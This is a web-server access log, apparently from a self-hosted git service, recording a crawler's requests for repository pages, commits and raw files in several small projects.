"/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 216.73.216.188] [Length 11299] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FProgram.cs" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12761] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" [Client 216.73.216.188] [Length 9826] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 216.73.216.188] [Length 10338] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 216.73.216.188] [Length 31012] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css?display=source" [Client 216.73.216.188] [Length 21547] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11882] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" [Client 216.73.216.188] [Length 10169] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14882] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 216.73.216.188] [Length 11341] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 216.73.216.188] [Length 11889] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 17364] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" [Client 216.73.216.188] [Length 10700] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2FOpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FOpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 22056] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 10139] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fdatabase.sqlite" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 216.73.216.188] [Length 9872] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 216.73.216.188] [Length 11485] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fpython3.12" [Client 216.73.216.188] [Length 23619] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fglobal.json" [Client 216.73.216.188] [Length 21272] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 10062] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 216.73.216.188] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" [Client 216.73.216.188] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/lib64" -[15/Feb/2026:10:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 216.73.216.188] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 216.73.216.188] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9773] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 14303] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 11755] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 12204] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2?display=source" [Client 216.73.216.188] [Length 20237] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Footer.tsx" [Client 216.73.216.188] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 26852] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/services" [Client 216.73.216.188] [Length 9786] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 216.73.216.188] [Length 12737] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" [Client 216.73.216.188] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.Notebook" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Ffallback_error.log" [Client 216.73.216.188] [Length 21173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2?display=source" [Client 216.73.216.188] [Length 21984] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 216.73.216.188] [Length 9834] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 10167] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2?display=source" [Client 216.73.216.188] [Length 14704] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/index.tsx" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 216.73.216.188] [Length 10509] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 12753] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 10131] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fservices" [Client 216.73.216.188] [Length 25004] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 22054] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 216.73.216.188] [Length 14388] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md?display=rendered" [Client 216.73.216.188] [Length 13448] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" [Client 216.73.216.188] [Length 10285] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" [Client 216.73.216.188] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 11590] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Services.tsx" [Client 216.73.216.188] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore?display=source" 